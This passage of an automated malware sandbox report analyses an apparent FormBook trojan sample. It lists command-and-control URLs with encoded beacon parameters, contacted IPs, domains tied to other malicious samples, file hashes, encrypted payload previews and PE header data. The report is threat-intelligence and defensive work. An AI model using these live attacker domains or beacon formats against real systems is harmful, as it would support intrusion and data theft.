http://www.duyordu.xyz/gae2/?nbd8Y=hfD0&QzmLxn8=otss0rWhIHnhk11bHpADtP94ljsZH/GQRLn65mx6qQBII5Hy/33+pU4ua28O/MN/hGVNt5jqk6AiUDpzXtwsnMZeIw/tUiqDcE1HIDKqYpe8NoemdkbdmjFvjmoOl2KsKw==	true	Avira URL Cloud: safe	unknown
http://www.jotchuadog.xyz/jta9/	true	Avira URL Cloud: safe	unknown
http://www.smartcongress.net/rwyw/?QzmLxn8=tUBKVtCXMBuJNHIpFqiFgzGd5gfnYoalLGMy8MAQ+Jhmg3oHbxgD99VhXdh+qXtYYooesRAVLXyHvMNOjYpU7DvvjDJcGU7DA+zjkrEkOcvVml7XwTJpjMjN9RU0yceV1A==&nbd8Y=hfD0	true	Avira URL Cloud: safe	unknown
http://www.108.foundation/lnu5/?nbd8Y=hfD0&QzmLxn8=QNT/15ZZU6AsGiWjSRYKkt/6S9anaGtoX8GfFyWC43f2cikt7PUu3WS46j+T51paYxuS3ixH2vbh2sKfAJw3ojfp25nO6F6qHofbl88ReUJsLvfvq1VL21AHNWbpiK3IyQ==	true	Avira URL Cloud: safe	unknown
http://www.ampsamkok88.shop/d5ko/	true	Avira URL Cloud: safe	unknown
http://www.dating-apps-az-dn5.xyz/oh72/	true	Avira URL Cloud: safe	unknown
http://www.ampsamkok88.shop/d5ko/?QzmLxn8=47Sch4Dsymg0jF3r4GDuCB6kzGYKh0WeL2yhy5BrefofQJ2dMwfirGLwiNRn/0xtXVPtxdeSAw3k3lUcttDNE/CgCPcxlvUG/WK2ZsoqDDwcP3eNWypVGILe8DfKTq90/A==&nbd8Y=hfD0	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://optimize.google.com	calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.googleanalytics.com	calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	calc.exe, 00000005.00000002.3338976521.0000000005D98000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 00000005.00000002.3340981972.0000000007F40000.00000004.00000800.00020000.00000000.sdmp, calc.exe, 00000005.00000002.3338976521.0000000005A74000.00000004.10000000.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002CE8000.00000004.00000001.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.00000000029C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2195895650.0000000037794000.00000004.80000000.00040000.00000000.sdmp	false		high
https://www.googleoptimize.com	calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	false		high
https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693	calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 00000005.00000002.3340981972.0000000007F40000.00000004.00000800.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.ampsamkok88.shop	uDeZXYtzetmc.exe, 00000008.00000002.3339789975.0000000004A8E000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://td.doubleclick.net	calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fburl.com	calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	calc.exe, 00000005.00000002.3338976521.0000000006572000.00000004.10000000.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false		high
https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693	calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 00000005.00000002.3340981972.0000000007F40000.00000004.00000800.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
146.88.233.115	smartcongress.net	France	53589	PLANETHOSTER-8CA	false
13.248.169.48	www.108.foundation	United States	16509	AMAZON-02US	true
162.0.213.94	www.wintus.top	Canada	35893	ACPCA	true
104.21.7.187	www.gk88top.top	United States	13335	CLOUDFLARENETUS	true
18.139.62.226	dns.ladipage.com	United States	16509	AMAZON-02US	false
199.59.243.228	www.dating-apps-az-dn5.xyz	United States	395082	BODIS-NJUS	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
3.33.130.190	ampsamkok88.shop	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587957
Start date and time:	2025-01-10 19:54:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	bkTW1FbgHN.exe renamed because original name is a hash value
Original Sample Name:	154ac63a4aa96b43d3622549ff591e9c4b7ee1942c48d31c32e843d66dc781a1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@9/8
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 85% Number of executed functions: 51 Number of non-executed functions: 275
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
146.88.233.115	RFQ_P.O.1212024.scr	Get hash	malicious	FormBook	Browse	www.smartcongress.net/m1g9/
	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.smartcongress.net/qtfx/
	NEW.RFQ00876.pdf.exe	Get hash	malicious	FormBook	Browse	www.smartcongress.net/m1g9/
	Quotation Validity.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.smartcongress.net/qtfx/
	W3MzrFzSF0.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.smartcongress.net/11t3/
	Quotation sheet.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.smartcongress.net/11t3/
	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	www.smartcongress.net/qtfx/
	PO #2411071822.exe	Get hash	malicious	FormBook	Browse	www.smartcongress.net/11t3/
	Quotation.exe	Get hash	malicious	FormBook	Browse	www.smartcongress.net/11t3/
	payments.exe	Get hash	malicious	FormBook	Browse	www.smartcongress.net/11t3/
13.248.169.48	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	www.tals.xyz/h8xm/
	QmBbqpEHu0.exe	Get hash	malicious	FormBook	Browse	www.hsa.world/09b7/
	cNDddMAF5u.exe	Get hash	malicious	FormBook	Browse	www.bcg.services/5onp/
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	www.shipley.group/5g1j/
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P
	TU0kiz3mxz.exe	Get hash	malicious	FormBook	Browse	www.cleans.xyz/m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.bonheur.tech/t3iv/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.bonheur.tech/t3iv/
	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.londonatnight.coffee/13to/
	236236236.elf	Get hash	malicious	Unknown	Browse	portlandbeauty.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.dating-apps-az-dn5.xyz	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	199.59.243.228
	DHL_734825510.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Invoice 10493.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	SW_5724.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
dns.ladipage.com	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	ORDER - 401.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	ORDER-401.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	SHIPPING DOCUMENTS_PDF.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	CJE003889.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	MAERSK LINE SHIPPING DOC_4253.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	QUOTATON-37839993.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	54.179.173.60
	Docs.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	18.139.62.226
www.gk88top.top	Quotation Request-349849.exe	Get hash	malicious	FormBook	Browse	172.67.137.47
	QUOTATON-37839993.exe	Get hash	malicious	FormBook	Browse	104.21.7.187
	purchase order.exe	Get hash	malicious	FormBook	Browse	104.21.7.187
	attached invoice.exe	Get hash	malicious	FormBook	Browse	104.21.7.187
	attached order.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.21.7.187
ampsamkok88.shop	Quotation sheet.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.209.48
	PO #2411071822.exe	Get hash	malicious	FormBook	Browse	172.67.209.48
	Quotation.exe	Get hash	malicious	FormBook	Browse	172.67.209.48
	payments.exe	Get hash	malicious	FormBook	Browse	172.67.209.48

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	QmBbqpEHu0.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	frosty.arm.elf	Get hash	malicious	Mirai	Browse	18.140.171.98
	frosty.spc.elf	Get hash	malicious	Mirai	Browse	54.189.236.62
	Message.eml	Get hash	malicious	Unknown	Browse	34.249.87.52
	frosty.sh4.elf	Get hash	malicious	Mirai	Browse	18.188.126.130
	cNDddMAF5u.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Get hash	malicious	HTMLPhisher	Browse	108.138.26.73
	RubzLi27lr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	3.130.71.34
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
ACPCA	armv4l.elf	Get hash	malicious	Unknown	Browse	162.48.74.191
	Fantazy.i486.elf	Get hash	malicious	Unknown	Browse	162.9.114.234
	Fantazy.spc.elf	Get hash	malicious	Unknown	Browse	162.33.209.59
	5.elf	Get hash	malicious	Unknown	Browse	162.56.1.17
	miori.arm5.elf	Get hash	malicious	Unknown	Browse	162.1.10.7
	arm5.elf	Get hash	malicious	Mirai	Browse	162.32.170.30
	armv7l.elf	Get hash	malicious	Unknown	Browse	162.49.35.179
	31.13.224.14-x86-2025-01-03T22_14_18.elf	Get hash	malicious	Mirai	Browse	162.8.196.39
	armv4l.elf	Get hash	malicious	Mirai	Browse	162.37.24.232
	DEMONS.sh4.elf	Get hash	malicious	Unknown	Browse	162.32.170.69
CLOUDFLARENETUS	m0CZ8H4jfl.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	Message 2.eml	Get hash	malicious	Unknown	Browse	172.64.41.3
	FPACcnxAUT.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	jxy62Zm6c4.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	frosty.arm.elf	Get hash	malicious	Mirai	Browse	104.23.145.230
	Message.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	s2Jg1MAahY.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	fGu8xWoMrg.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Get hash	malicious	HTMLPhisher	Browse	172.64.147.188
PLANETHOSTER-8CA	RFQ_P.O.1212024.scr	Get hash	malicious	FormBook	Browse	146.88.233.115
	PO2412010.exe	Get hash	malicious	FormBook	Browse	146.88.233.115
	NEW.RFQ00876.pdf.exe	Get hash	malicious	FormBook	Browse	146.88.233.115
	Quotation Validity.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	146.88.233.115
	W3MzrFzSF0.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	146.88.233.115
	Quotation sheet.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	146.88.233.115
	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	146.88.233.115
	PO #2411071822.exe	Get hash	malicious	FormBook	Browse	146.88.233.115
	Quotation.exe	Get hash	malicious	FormBook	Browse	146.88.233.115
	payments.exe	Get hash	malicious	FormBook	Browse	146.88.233.115

Process:	C:\Windows\SysWOW64\calc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autB68F.tmp

Download File

Process:	C:\Users\user\Desktop\bkTW1FbgHN.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.9940403257022075
Encrypted:	true
SSDEEP:	6144:tZWBO9d9izpMpEq8U2ffD+V0lRN2LhnZDp:tZ3icGDK0lr2L7Dp
MD5:	39A069D4E32AC49312914E4CB6D79B74
SHA1:	2EAF4A885647447A1E5D680AF5FD7F059FA7A1C4
SHA-256:	C5309810570E6AF1489188266FE04707E0E8B2D102371F4F29E9B91A67974C6D
SHA-512:	039F477B0A8ED1BE567ACDE476544D8185482EB0D90A71E2C859FA42B606BDB38643703DAC06A9AACDC80A887D81D8E090FCF33E4C66DA138C50465D3517D841
Malicious:	false
Reputation:	low
Preview:	.n.LIFGEW9SP.M4.LJFGES9.P8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NL.FGE]&.^8.D.o.K..d.Q:#.??[)>++g&2W=?Lo/Qn>?(g,=...ko [*)dKJOw9SP8OM47MC.z%4.n0_.pT).P..iY4."...r,-.]...o0_..]-$w& .S9SP8OM4..JF.DR9.I./M4NLJFGE.9QQ3NF4N.NFGES9SP8O. NLJVGESIWP8O.4N\JFGGS9UP8OM4NLLFGES9SP8?I4NNJFGES9QPx.M4^LJVGES9CP8_M4NLJFWES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP.;(L:LJF..W9S@8OMlJLJVGES9SP8OM4NLJFgESYSP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJF

C:\Users\user\AppData\Local\Temp\jailless

Download File

Process:	C:\Users\user\Desktop\bkTW1FbgHN.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.9940403257022075
Encrypted:	true
SSDEEP:	6144:tZWBO9d9izpMpEq8U2ffD+V0lRN2LhnZDp:tZ3icGDK0lr2L7Dp
MD5:	39A069D4E32AC49312914E4CB6D79B74
SHA1:	2EAF4A885647447A1E5D680AF5FD7F059FA7A1C4
SHA-256:	C5309810570E6AF1489188266FE04707E0E8B2D102371F4F29E9B91A67974C6D
SHA-512:	039F477B0A8ED1BE567ACDE476544D8185482EB0D90A71E2C859FA42B606BDB38643703DAC06A9AACDC80A887D81D8E090FCF33E4C66DA138C50465D3517D841
Malicious:	false
Preview:	.n.LIFGEW9SP.M4.LJFGES9.P8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NL.FGE]&.^8.D.o.K..d.Q:#.??[)>++g&2W=?Lo/Qn>?(g,=...ko [*)dKJOw9SP8OM47MC.z%4.n0_.pT).P..iY4."...r,-.]...o0_..]-$w& .S9SP8OM4..JF.DR9.I./M4NLJFGE.9QQ3NF4N.NFGES9SP8O. NLJVGESIWP8O.4N\JFGGS9UP8OM4NLLFGES9SP8?I4NNJFGES9QPx.M4^LJVGES9CP8_M4NLJFWES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP.;(L:LJF..W9S@8OMlJLJVGES9SP8OM4NLJFgESYSP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJFGES9SP8OM4NLJF

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.185450097645964
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	bkTW1FbgHN.exe
File size:	1'203'712 bytes
MD5:	03058e6963643582d3b8bfce25d7320f
SHA1:	a412200951397af08cec97115f957fee91baf1b2
SHA256:	154ac63a4aa96b43d3622549ff591e9c4b7ee1942c48d31c32e843d66dc781a1
SHA512:	cac0685080ecaef16cad8da9c4a5be4ff4fbe9fe6e909a3548d0698be1c1ce4f0205385c001c84c8b359980f6c09d0117baef030e8964582ac7d9016e9bb8daa
SSDEEP:	24576:6u6J33O0c+JY5UZ+XC0kGso6Fa/YsFz2pRUGmdC2/ZucWY:Mu0c++OCvkGs9Fa/jFz2KhRkY
TLSH:	3F45CF2273DDC360CB769173BF6AB7016EBF78610630B85B2F980D7DA950162162D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67602026 [Mon Dec 16 12:42:14 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FDAEC7B98BAh
jmp 00007FDAEC7AC684h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FDAEC7AC80Ah
cmp edi, eax
jc 00007FDAEC7ACB6Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FDAEC7AC809h
rep movsb
jmp 00007FDAEC7ACB1Ch
cmp ecx, 00000080h
jc 00007FDAEC7AC9D4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FDAEC7AC810h
bt dword ptr [004BE324h], 01h
jc 00007FDAEC7ACCE0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FDAEC7AC9ADh
test edi, 00000003h
jne 00007FDAEC7AC9BEh
test esi, 00000003h
jne 00007FDAEC7AC99Dh
bt edi, 02h
jnc 00007FDAEC7AC80Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FDAEC7AC813h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FDAEC7AC865h
bt esi, 03h
jnc 00007FDAEC7AC8B8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x5d458	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x125000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x5d458	0x5d600	05ae94dd43c2b82f27a903eac2538a2b	False	0.9291828773427041	data	7.8981147331004085	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
